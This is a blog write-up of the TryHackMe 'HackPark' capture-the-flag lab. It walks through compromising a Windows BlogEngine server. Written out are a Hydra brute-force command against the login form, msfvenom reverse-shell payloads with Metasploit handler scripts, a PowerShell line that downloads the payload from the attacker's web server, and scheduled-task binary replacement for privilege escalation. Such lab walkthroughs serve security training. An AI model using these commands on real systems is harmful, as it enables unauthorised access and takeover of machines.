TryHackMe Room Hackpark
@ Animesh Roy | Saturday, Jun 19, 2021 | 5 minutes read | Update at Saturday, Jun 19, 2021


Room link : HackPark

task 01: Deploy the vulnerable Windows machine

This room will cover brute-forcing an accounts credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.


1Deploy the machine and access its web server.
2Whats the name of the clown displayed on the homepage?
download the img and do a reverse Image search ans is PENNYWISE

task 02: Using Hydra to brute-force a login


1 : find the directory using gobuster

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2021/06/19 20:08:03 Starting gobuster in directory enumeration mode

/account              (Status: 301) [Size: 152] [-->]
/admin                (Status: 302) [Size: 173] [-->]


we got /admin dir here, let’s check this out.


Flags 2.1

1What request type is the Windows website login form using?

Flag 2.2

Hydra bruteforce command

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=eRnxFX0KeP0JSP3NUgJuQNgMv0s2Vbi3LgmkZ1b13u5XVzxoWRsgjuZ1i9zBwladu1Sn2olX%2BOFslf3MYIG%2BlcCFhPNOo39g9aaorqmfZ93BBwYH%2BU66nHfBoPd6mu2nKWfs4%2FFZacIS%2Ff1LUkpUlG29J6pqWWdWu1XGrlgHl4lNicNd&__EVENTVALIDATION=fLvo1twKPtwoRdRfJPlthZ9VW0RmhUAGor8gmqwlkM3r%2BiRaQAOP97BUNWjE%2BbVSNzZnye1kEuI2S72bUGOZqDPu0E7weYfJPUYT6xHHJ0%2F8wMA8ovjF9GRdvpIR0cHRYE%2BLAC2eUQ5%2ByMBbSzIv92ZRoxDToB5I4z4eiaYaGYKRGxvj&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"


task 03: Compromise the machine

Exploit-Database is a CVE (common vulnerability and exposures) archive of public exploits and corresponding vulnerable software, developed for the use of penetration testers and vulnerability researches. It is owned by Offensive Security (who are responsible for OSCP and Kali)

Exploit: Exploit-DB

Flag 3.1

Now you have logged into the website, are you able to identify the version of the BlogEngine?


add CVE- then the exploit ID

flag 3.2

What is the CVE?


flag 3.3

Who is the webserver running as?

get the reverse connection working as mentioned in exploit page, once that done run whoami command to get the ans.


task 04: Windows Privilege Escalation

  • generate the shell
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport=1337 -f exe -o supershell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: supershell.exe
  • msf.rc conf
└─$ cat www/msf.rc 
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost
set lport 1337
set exitonsession false
exploit -j 
  • run the listener
└─$ msfconsole -q -r msf.rc 
  • run the webserver (linux)
# Change dir where is your exe file located
sudo python3 -m http.server 80 
#my exe is supershell.exe.exe
  • download shell on target
# download 
c:\Windows\Temp>powershell -c "Invoke-WebRequest -Uri '' -OutFile 'shell.exe'"
  • Msfconsole
msf6 exploit(multi/handler) > [*] Sending stage (200262 bytes) to
msf6 exploit(multi/handler) > [*] Meterpreter session 1 opened ( -> at 2021-06-19 21:01:05 +0530
  • get root


upload shell to C:\Program Files (x86)\SystemScheduler chage shell.exe to Message.exe

Flag 4.1

Tip: You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually! no ans required

Flag 4.2

What is the OS version of this windows machine?

run sysinfo in meterpreter shell.


Flag 4.3

What is the name of the abnormal service running?

WScheduler.exe names as WindowsScheduler

Flag 4.4

What is the name of the binary you’re supposed to exploit?


  • find the log in C:\Program Files (x86)\SystemScheduler\Events
meterpreter > ls
Listing: C:\Program Files (x86)\SystemScheduler\Events

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  1926   fil   2019-08-05 03:35:19 +0530  20198415519.INI
100666/rw-rw-rw-  31219  fil   2019-08-05 03:36:01 +0530  20198415519.INI_LOG.txt
100666/rw-rw-rw-  290    fil   2020-10-03 03:20:12 +0530  2020102145012.INI
100666/rw-rw-rw-  186    fil   2021-06-19 19:45:08 +0530  Administrator.flg
100666/rw-rw-rw-  182    fil   2021-06-19 19:44:39 +0530  SYSTEM_svc.flg
100666/rw-rw-rw-  0      fil   2021-06-19 19:45:08 +0530  Scheduler.flg
100666/rw-rw-rw-  449    fil   2019-08-04 17:06:53 +0530  SessionInfo.flg
100666/rw-rw-rw-  0      fil   2021-06-19 19:44:39 +0530  service.flg
  • read the log
06/19/21 08:52:33,Process Ended. PID:1852,ExitCode:4,Message.exe (Administrator)
06/19/21 08:53:01,Event Started Ok, (Administrator)
06/19/21 08:53:33,Process Ended. PID:1688,ExitCode:4,Message.exe (Administrator)
06/19/21 08:54:05,Event Started Ok, (Administrator)

Flag 4.5

What is the user flag (on Jeffs Desktop)?

we already have admininstrator shell to view flags.


What is the root flag?


Task 05: Privilege Escalation Without Metasploit

In this task we will escalate our privileges without the use of meterpreter/metasploit! Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell. Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.


Flag 5.1

Now we can generate a more stable shell using msfvenom, instead of using a meterpreter, This time let’s set our payload to windows/shell_reverse_tcp

  • used this website to generate the shellcode.

  • msf.rc

    #saved as shell.rc
    use exploit/multi/handler
    set payload windows/x64/shell_reverse_tcp 
    set lhost
    set lport 1337
    set exitonsession false
    exploit -j
  • run listener msfconsole -r shell.rc

  • upload the file powershell -c "Invoke-WebRequest -Uri '' -OutFile 'rev.exe'"

  • run the file

Flag 5.2

Tip: It’s common to find C:\Windows\Temp is world writable!

Flag 5.3

WinPeas is a great tool which will enumerate the system and attempt to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!

Using winPeas, what was the Original Install time? (This is date and time) 8/3/2019, 10:43:23 AM

a systeminfo.exe commnd gives it away.

© 2010 - 2024 Classroom

Reading Stuffs

Social Links